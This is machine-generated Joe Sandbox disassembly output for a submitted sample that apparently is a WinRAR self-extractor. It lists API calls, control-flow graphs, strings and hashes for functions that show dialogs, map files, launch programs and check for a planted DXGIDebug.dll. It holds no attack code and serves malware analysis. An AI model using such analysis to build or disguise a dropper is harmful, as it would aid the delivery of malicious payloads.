                                                                                                                    Function 00BA7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00BA7DC4,00000000,00BBC300,0000000C,00BA7F1B,00000000,00000002,00000000), ref: 00BA7E0F
                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00BA7DC4,00000000,00BBC300,0000000C,00BA7F1B,00000000,00000002,00000000), ref: 00BA7E16
                                                                                                                    • ExitProcess.KERNEL32 ref: 00BA7E28
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1703294689-0
                                                                                                                    • Opcode ID: 5c0efcad71bb30e9f97b14cddd385dd6819cfc855af1144372d1619faffab67d
                                                                                                                    • Instruction ID: da22a0e0856beb761c60954ce6f2fa0f758eb99e9c1b943d6a5bff7f33893830
                                                                                                                    • Opcode Fuzzy Hash: 5c0efcad71bb30e9f97b14cddd385dd6819cfc855af1144372d1619faffab67d
                                                                                                                    • Instruction Fuzzy Hash: EAE01232048148ABCB116F24CD09A4A3BAEEF11741B004595F8199B132CF76EE92CA80
                                                                                                                    Function 00B8848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 79120550e7e4924d5c845079dbfa2982026b0da1d99fdef2f840301a61ed92ca
                                                                                                                    • Instruction ID: 97ab27b8d44de53d37c01dcea9d7848734f19b9609a47563c19d400d3f8b58d1
                                                                                                                    • Opcode Fuzzy Hash: 79120550e7e4924d5c845079dbfa2982026b0da1d99fdef2f840301a61ed92ca
                                                                                                                    • Instruction Fuzzy Hash: E8820870904245AFDF26EF64C891BFABBF9EF15300F4845F9E8499B162DB315A84CB60
                                                                                                                    Function 00B9B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B9B7E5
                                                                                                                      • Part of subcall function 00B81316: GetDlgItem.USER32(00000000,00003021), ref: 00B8135A
                                                                                                                      • Part of subcall function 00B81316: SetWindowTextW.USER32(00000000,00BB35F4), ref: 00B81370
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B9B8D1
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9B8EF
                                                                                                                    • IsDialogMessageW.USER32(?,?), ref: 00B9B902
                                                                                                                    • TranslateMessage.USER32(?), ref: 00B9B910
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00B9B91A
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00B9B93D
                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00B9B960
                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 00B9B983
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B9B99E
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00BB35F4), ref: 00B9B9B1
                                                                                                                      • Part of subcall function 00B9D453: _wcslen.LIBCMT ref: 00B9D47D
                                                                                                                    • SetFocus.USER32(00000000), ref: 00B9B9B8
                                                                                                                    • _swprintf.LIBCMT ref: 00B9BA24
                                                                                                                      • Part of subcall function 00B84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B840A5
                                                                                                                      • Part of subcall function 00B9D4D4: GetDlgItem.USER32(00000068,00BDFCB8), ref: 00B9D4E8
                                                                                                                      • Part of subcall function 00B9D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00B9AF07,00000001,?,?,00B9B7B9,00BB506C,00BDFCB8,00BDFCB8,00001000,00000000,00000000), ref: 00B9D510
                                                                                                                      • Part of subcall function 00B9D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B9D51B
                                                                                                                      • Part of subcall function 00B9D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00BB35F4), ref: 00B9D529
                                                                                                                      • Part of subcall function 00B9D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B9D53F
                                                                                                                      • Part of subcall function 00B9D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B9D559
                                                                                                                      • Part of subcall function 00B9D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B9D59D
                                                                                                                      • Part of subcall function 00B9D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B9D5AB
                                                                                                                      • Part of subcall function 00B9D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B9D5BA
                                                                                                                      • Part of subcall function 00B9D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B9D5E1
                                                                                                                      • Part of subcall function 00B9D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00BB43F4), ref: 00B9D5F0
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00B9BA68
                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00B9BA90
                                                                                                                    • GetTickCount.KERNEL32 ref: 00B9BAAE
                                                                                                                    • _swprintf.LIBCMT ref: 00B9BAC2
                                                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 00B9BAF4
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00B9BB43
                                                                                                                    • _swprintf.LIBCMT ref: 00B9BB7C
                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00B9BBD0
                                                                                                                    • GetCommandLineW.KERNEL32 ref: 00B9BBEA
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00B9BC47
                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00B9BC6F
                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00B9BCB9
                                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00B9BCE2
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B9BCEB
                                                                                                                    • _swprintf.LIBCMT ref: 00B9BD1E
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B9BD7D
                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,00BB35F4), ref: 00B9BD94
                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 00B9BD9D
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00B9BDAC
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B9BDBB
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B9BE68
                                                                                                                    • _wcslen.LIBCMT ref: 00B9BEBE
                                                                                                                    • _swprintf.LIBCMT ref: 00B9BEE8
                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00B9BF32
                                                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00B9BF4C
                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 00B9BF55
                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00B9BF6B
                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 00B9BF85
                                                                                                                    • SetWindowTextW.USER32(00000000,00BCA472), ref: 00B9BFA7
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00B9C007
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B9C01A
                                                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00B9C0BD
                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00B9C197
                                                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00B9C1D9
                                                                                                                      • Part of subcall function 00B9C73F: __EH_prolog.LIBCMT ref: 00B9C744
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B9C1FD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                    • API String ID: 3445078344-1670982708
                                                                                                                    • Opcode ID: afa1aa0614bc9dc277203085f670f6065be96981b6c23b1f80f7e95b0d87b788
                                                                                                                    • Instruction ID: bfa73de0d0230a82082bcbf3edbe6ec9a4f932326acde852760e1365bdf4a96d
                                                                                                                    • Opcode Fuzzy Hash: afa1aa0614bc9dc277203085f670f6065be96981b6c23b1f80f7e95b0d87b788
                                                                                                                    • Instruction Fuzzy Hash: 4242D571944248BAEF21ABA4AD8AFBE7BECDB05B00F1400E5F545B71E2DF745A44CB21
                                                                                                                    Function 00B90863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 268 b90863-b90886 call b9ec50 GetModuleHandleW 271 b90888-b9089f GetProcAddress 268->271 272 b908e7-b90b48 268->272 273 b908b9-b908c9 GetProcAddress 271->273 274 b908a1-b908b7 271->274 275 b90b4e-b90b59 call ba75fb 272->275 276 b90c14-b90c40 GetModuleFileNameW call b8c29a call b90602 272->276 278 b908cb-b908e0 273->278 279 b908e5 273->279 274->273 275->276 285 b90b5f-b90b8d GetModuleFileNameW CreateFileW 275->285 290 b90c42-b90c4e call b8b146 276->290 278->279 279->272 288 b90c08-b90c0f CloseHandle 285->288 289 b90b8f-b90b9b SetFilePointer 285->289 288->276 289->288 291 b90b9d-b90bb9 ReadFile 289->291 297 b90c7d-b90ca4 call b8c310 GetFileAttributesW 290->297 298 b90c50-b90c5b call b9081b 290->298 291->288 294 b90bbb-b90be0 291->294 296 b90bfd-b90c06 call b90371 294->296 296->288 305 b90be2-b90bfc call b9081b 296->305 308 b90cae 297->308 309 b90ca6-b90caa 297->309 298->297 307 b90c5d-b90c7b CompareStringW 298->307 305->296 307->297 307->309 312 b90cb0-b90cb5 308->312 309->290 311 b90cac 309->311 311->312 313 b90cec-b90cee 312->313 314 b90cb7 312->314 316 b90dfb-b90e05 313->316 317 b90cf4-b90d0b call b8c2e4 call b8b146 313->317 315 b90cb9-b90ce0 call b8c310 GetFileAttributesW 314->315 322 b90cea 315->322 323 b90ce2-b90ce6 315->323 327 b90d0d-b90d6e call b9081b * 2 call b8e617 call b84092 call b8e617 call b9a7e4 317->327 328 b90d73-b90da6 call b84092 AllocConsole 317->328 322->313 323->315 325 b90ce8 323->325 325->313 335 b90df3-b90df5 ExitProcess 327->335 334 b90da8-b90ded GetCurrentProcessId AttachConsole call ba3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->334 328->335 334->335
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 00B9087C
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B9088E
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B908BF
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B90B69
                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B90B83
                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B90B93
                                                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,00BB3C7C,00000000), ref: 00B90BB1
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B90C09
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B90C1E
                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00BB3C7C,?,00000000,?,00000800), ref: 00B90C72
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00BB3C7C,00000800,?,00000000,?,00000800), ref: 00B90C9C
                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,00BB3D44,00000800), ref: 00B90CD8
                                                                                                                      • Part of subcall function 00B9081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B90836
                                                                                                                      • Part of subcall function 00B9081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B8F2D8,Crypt32.dll,00000000,00B8F35C,?,?,00B8F33E,?,?,?), ref: 00B90858
                                                                                                                    • _swprintf.LIBCMT ref: 00B90D4A
                                                                                                                    • _swprintf.LIBCMT ref: 00B90D96
                                                                                                                      • Part of subcall function 00B84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B840A5
                                                                                                                    • AllocConsole.KERNEL32 ref: 00B90D9E
                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00B90DA8
                                                                                                                    • AttachConsole.KERNEL32(00000000), ref: 00B90DAF
                                                                                                                    • _wcslen.LIBCMT ref: 00B90DC4
                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00B90DD5
                                                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00B90DDC
                                                                                                                    • Sleep.KERNEL32(00002710), ref: 00B90DE7
                                                                                                                    • FreeConsole.KERNEL32 ref: 00B90DED
                                                                                                                    • ExitProcess.KERNEL32 ref: 00B90DF5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                                    • API String ID: 1207345701-3298887752
                                                                                                                    • Opcode ID: 2a30b0f1697223b0fa1c91fd95713def718d2ee74e808d80d06ab645167933b9
                                                                                                                    • Instruction ID: 975349dd97fe7990ad9d836b7e09b5dafff8c730e413f792240be9e3fe00d21b
                                                                                                                    • Opcode Fuzzy Hash: 2a30b0f1697223b0fa1c91fd95713def718d2ee74e808d80d06ab645167933b9
                                                                                                                    • Instruction Fuzzy Hash: FED183B2458344AFD720AF50C889BEFBAE8FF85B04F5049ADF18597151CBF09648CB62
                                                                                                                    Function 00B9C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 347 b9c73f-b9c757 call b9eb78 call b9ec50 352 b9d40d-b9d418 347->352 353 b9c75d-b9c787 call b9b314 347->353 353->352 356 b9c78d-b9c792 353->356 357 b9c793-b9c7a1 356->357 358 b9c7a2-b9c7b7 call b9af98 357->358 361 b9c7b9 358->361 362 b9c7bb-b9c7d0 call b91fbb 361->362 365 b9c7dd-b9c7e0 362->365 366 b9c7d2-b9c7d6 362->366 368 b9d3d9-b9d404 call b9b314 365->368 369 b9c7e6 365->369 366->362 367 b9c7d8 366->367 367->368 368->357 380 b9d40a-b9d40c 368->380 371 b9c7ed-b9c7f0 369->371 372 b9ca7c-b9ca7e 369->372 373 b9ca5f-b9ca61 369->373 374 b9c9be-b9c9c0 369->374 371->368 379 b9c7f6-b9c850 call b9a64d call b8bdf3 call b8a544 call b8a67e call b86edb 371->379 372->368 377 b9ca84-b9ca8b 372->377 373->368 376 b9ca67-b9ca77 SetWindowTextW 373->376 374->368 378 b9c9c6-b9c9d2 374->378 376->368 377->368 381 b9ca91-b9caaa 377->381 382 b9c9d4-b9c9e5 call ba7686 378->382 383 b9c9e6-b9c9eb 378->383 435 b9c98f-b9c9a4 call b8a5d1 379->435 380->352 385 b9caac 381->385 386 b9cab2-b9cac0 call ba3e13 381->386 382->383 389 b9c9ed-b9c9f3 383->389 390 b9c9f5-b9ca00 call b9b48e 383->390 385->386 386->368 404 b9cac6-b9cacf 386->404 391 b9ca05-b9ca07 389->391 390->391 397 b9ca09-b9ca10 call ba3e13 391->397 398 b9ca12-b9ca32 call ba3e13 call ba3e3e 391->398 397->398 424 b9ca4b-b9ca4d 398->424 425 b9ca34-b9ca3b 398->425 408 b9caf8-b9cafb 404->408 409 b9cad1-b9cad5 404->409 410 b9cb01-b9cb04 408->410 413 b9cbe0-b9cbee call b90602 408->413 409->410 411 b9cad7-b9cadf 409->411 418 b9cb11-b9cb2c 410->418 419 b9cb06-b9cb0b 410->419 411->368 416 b9cae5-b9caf3 call b90602 411->416 426 b9cbf0-b9cc04 call ba279b 413->426 416->426 436 b9cb2e-b9cb68 418->436 437 b9cb76-b9cb7d 418->437 419->413 419->418 424->368 427 b9ca53-b9ca5a call ba3e2e 424->427 431 b9ca3d-b9ca3f 425->431 432 b9ca42-b9ca4a call ba7686 425->432 446 b9cc11-b9cc62 call b90602 call b9b1be GetDlgItem SetWindowTextW SendMessageW call ba3e49 426->446 447 b9cc06-b9cc0a 426->447 427->368 431->432 432->424 453 b9c9aa-b9c9b9 call b8a55a 435->453 454 b9c855-b9c869 SetFileAttributesW 435->454 470 b9cb6a 436->470 471 b9cb6c-b9cb6e 436->471 440 b9cbab-b9cbce call ba3e13 * 2 437->440 441 b9cb7f-b9cb97 call ba3e13 437->441 440->426 475 b9cbd0-b9cbde call b905da 440->475 441->440 457 b9cb99-b9cba6 call b905da 441->457 481 b9cc67-b9cc6b 446->481 447->446 452 b9cc0c-b9cc0e 447->452 452->446 453->368 459 b9c90f-b9c91f GetFileAttributesW 454->459 460 b9c86f-b9c8a2 call b8b991 call b8b690 call ba3e13 454->460 457->440 459->435 468 b9c921-b9c930 DeleteFileW 459->468 491 b9c8b5-b9c8c3 call b8bdb4 460->491 492 b9c8a4-b9c8b3 call ba3e13 460->492 468->435 474 b9c932-b9c935 468->474 470->471 471->437 478 b9c939-b9c965 call b84092 GetFileAttributesW 474->478 475->426 487 b9c937-b9c938 478->487 488 b9c967-b9c97d MoveFileW 478->488 481->368 486 b9cc71-b9cc85 SendMessageW 481->486 486->368 487->478 488->435 490 b9c97f-b9c989 MoveFileExW 488->490 490->435 491->453 497 b9c8c9-b9c908 call ba3e13 call b9fff0 491->497 492->491 492->497 497->459
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B9C744
                                                                                                                      • Part of subcall function 00B9B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00B9B3FB
                                                                                                                    • _wcslen.LIBCMT ref: 00B9CA0A
                                                                                                                    • _wcslen.LIBCMT ref: 00B9CA13
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00B9CA71
                                                                                                                    • _wcslen.LIBCMT ref: 00B9CAB3
                                                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 00B9CBFB
                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 00B9CC36
                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00B9CC46
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,00BCA472), ref: 00B9CC54
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B9CC7F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                    • API String ID: 2804936435-312220925
                                                                                                                    • Opcode ID: d840eeb65f1a323a9a9c2b05260c337c2864b01a24dd6db170b27e74400202c9
                                                                                                                    • Instruction ID: a337deefa0aef6b9f110dd0cc527c4e0734d2d5d129cdd3d12bdfd7ff5d3f464
                                                                                                                    • Opcode Fuzzy Hash: d840eeb65f1a323a9a9c2b05260c337c2864b01a24dd6db170b27e74400202c9
                                                                                                                    • Instruction Fuzzy Hash: F9E14DB2904219AADF25EBA0DC85EEE77FCEB05710F5041F6F609E7051EF749A848B60
                                                                                                                    Function 00B8DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B8DA70
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B8DAAC
                                                                                                                      • Part of subcall function 00B8C29A: _wcslen.LIBCMT ref: 00B8C2A2
                                                                                                                      • Part of subcall function 00B905DA: _wcslen.LIBCMT ref: 00B905E0
                                                                                                                      • Part of subcall function 00B91B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B8BAE9,00000000,?,?,?,0001040E), ref: 00B91BA0
                                                                                                                    • _wcslen.LIBCMT ref: 00B8DDE9
                                                                                                                    • __fprintf_l.LIBCMT ref: 00B8DF1C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                                                    • API String ID: 566448164-801612888
                                                                                                                    • Opcode ID: 4c9b3a0a88c1fbdd2f086fc4df329d73353bda54a2d53b94cd856ccc53f8d266
                                                                                                                    • Instruction ID: efe5dd3b721924e8c6db0b034b3fa6a04fb7745d7c44b0dffbaf7b32d4027431
                                                                                                                    • Opcode Fuzzy Hash: 4c9b3a0a88c1fbdd2f086fc4df329d73353bda54a2d53b94cd856ccc53f8d266
                                                                                                                    • Instruction Fuzzy Hash: 9832B071900218EBCF24FF68C886AEA77E5FF15700F4405AAF915A72A1EBB1DD85CB50
                                                                                                                    Function 00B9D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B9B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B9B579
                                                                                                                      • Part of subcall function 00B9B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9B58A
                                                                                                                      • Part of subcall function 00B9B568: IsDialogMessageW.USER32(0001040E,?), ref: 00B9B59E
                                                                                                                      • Part of subcall function 00B9B568: TranslateMessage.USER32(?), ref: 00B9B5AC
                                                                                                                      • Part of subcall function 00B9B568: DispatchMessageW.USER32(?), ref: 00B9B5B6
                                                                                                                    • GetDlgItem.USER32(00000068,00BDFCB8), ref: 00B9D4E8
